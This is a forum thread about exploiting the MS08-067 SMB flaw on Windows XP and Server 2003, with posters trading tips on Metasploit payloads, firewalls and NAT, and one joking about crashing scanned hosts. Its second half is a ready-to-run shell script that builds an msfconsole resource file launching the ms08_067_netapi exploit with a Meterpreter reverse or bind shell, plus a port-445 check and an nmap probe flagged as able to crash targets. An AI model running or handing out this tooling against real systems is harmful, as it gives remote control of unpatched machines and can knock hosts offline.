I assume this will not work on a firewalled pc? Will test later when I get a chance
Yes it will. I did it on a fresh install of server 2003 with the default firewall settings. If the server is behind NAT you would have to change the payload to something that would connect back to you using a metasploit client or something along the lines of netcat. I guess I could expand the tutorial to include that if anyone's interested.
"Default firewall settings" means port 445 open????
Weird :confused:
Nice tutorial. Tried it on Windows XP SP3 and worked as soon as file and printer sharing was enabled in the firewall.
The windows/smb/ms08_067_netapi exploit can naturally also be used from within metasploit which will allow you to easily change the payload, for example to meterpreter.
Got everyone's permission last lunch break at school, and amazingly (at a computer school), 3 out of the 15 XP users were vulnerable (SP3). I created a text file on everyone's desktop linking to the patch :b.
I would recommend the Metasploit module as Tron says too. Combine it with the scanner/smb/version module and you're prepared (:
I was only posting an alternate way to do it.

Quote:
I would recommend the Metasploit module as Tron says too. Combine it with the scanner/smb/version module and you're prepared (:
I didn't mean it like that pureh@te. I myself found your tutorial very useful as I never knew about the nmap scripting engine, and it seems pretty cool (: . What I meant was the actual exploiting process might be more practical through metasploit as you have more options such as IDS evasion and payload selection.
Oh yeah and people do take care when using smb-check-vulns.nse. "Out of 82 vulnerable systems scanned, 52 crashed." :P
You have to break a few eggs to make an omelet :D

Quote:
Out of 82 vulnerable systems scanned, 52 crashed.
First of all, let me state this is an excellent thread. Haven't had one of these in months. Thanks pureh@te!
Tried this on my SP3 XP Box and it crashes with the firewall on! Now if I turn it off it will go through. Note that "file and printer sharing" is on by default. I used the metasploit framework with the windows/smb/ms08_067_netapi exploit and meterpreter as the payload. :confused:
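The thread makes three practical points: a NAT'd target needs a reverse (connect-back) payload instead of a bind payload, the Metasploit module lets you pick that payload and pair the exploit with an SMB version scan first, and a closed port 445 (firewall without the File and Printer Sharing exception) stops the whole thing before it starts. The script below is an added example, not code from the thread or from Metasploit, that turns those points into a generated msfconsole resource file plus a port-445 pre-check. Assumptions: the IPs are placeholders, `auxiliary/scanner/smb/smb_version` is the current path of the module the thread calls scanner/smb/version, `RHOSTS` is accepted by the exploit module (older releases used `RHOST`), and `smb-check-vulns` with `unsafe=1` is the old NSE script the thread warns about (current nmap ships it as `smb-vuln-ms08-067`).

```shell
#!/bin/sh
# Added example for the thread above; not from the original post or Metasploit.
# gen_rc TARGET MODE [LHOST] [LPORT]
#   MODE=bind    -> target is directly reachable, bind_tcp is fine
#   MODE=reverse -> target is behind NAT (as pureh@te notes), so the victim
#                   must connect back to LHOST, which the target must reach.
# Module/payload names are assumed to match current Metasploit paths.
gen_rc() {
  target=$1; mode=$2; lhost=$3; lport=${4:-4444}
  [ -n "$target" ] || { echo "usage: gen_rc TARGET bind|reverse [LHOST] [LPORT]" >&2; return 1; }
  # Fingerprint first (the "scanner/smb/version" step from the thread).
  cat <<EOF
use auxiliary/scanner/smb/smb_version
set RHOSTS $target
run
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $target
set RPORT 445
EOF
  case $mode in
    reverse)
      [ -n "$lhost" ] || { echo "reverse mode needs LHOST" >&2; return 1; }
      cat <<EOF
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
EOF
      ;;
    bind)
      cat <<EOF
set PAYLOAD windows/meterpreter/bind_tcp
set LPORT $lport
EOF
      ;;
    *)
      echo "mode must be bind or reverse" >&2
      return 1
      ;;
  esac
  echo "exploit -j"
}

# Is TCP/445 reachable at all? If not, the host firewall (or lack of the
# File and Printer Sharing exception on XP SP3) is blocking and neither the
# nmap script nor the exploit will get anywhere. Needs nc; returns 2 if absent.
port445_open() {
  command -v nc >/dev/null 2>&1 || { echo "nc not installed" >&2; return 2; }
  nc -z -w 3 "$1" 445 >/dev/null 2>&1
}

# The nmap check the thread warns about: unsafe=1 is what makes it actually
# probe MS08-067, and that probe can crash unpatched hosts. Assumed script
# name; newer nmap calls it smb-vuln-ms08-067.
vuln_scan_cmd() {
  printf 'nmap -p445 --script smb-check-vulns --script-args=unsafe=1 %s\n' "$1"
}

# Example usage (placeholder addresses):
#   gen_rc 192.168.1.10 reverse 192.168.1.5 > ms08.rc && msfconsole -q -r ms08.rc
#   port445_open 192.168.1.10 || echo "445 closed: firewall in the way"
```

Run the reachability check before the resource script; a closed 445 is the firewall case from the first post, not a patched host. Use `reverse` whenever you are not on the same segment as the target, since a bind shell on a NAT'd box is unreachable even when the exploit lands.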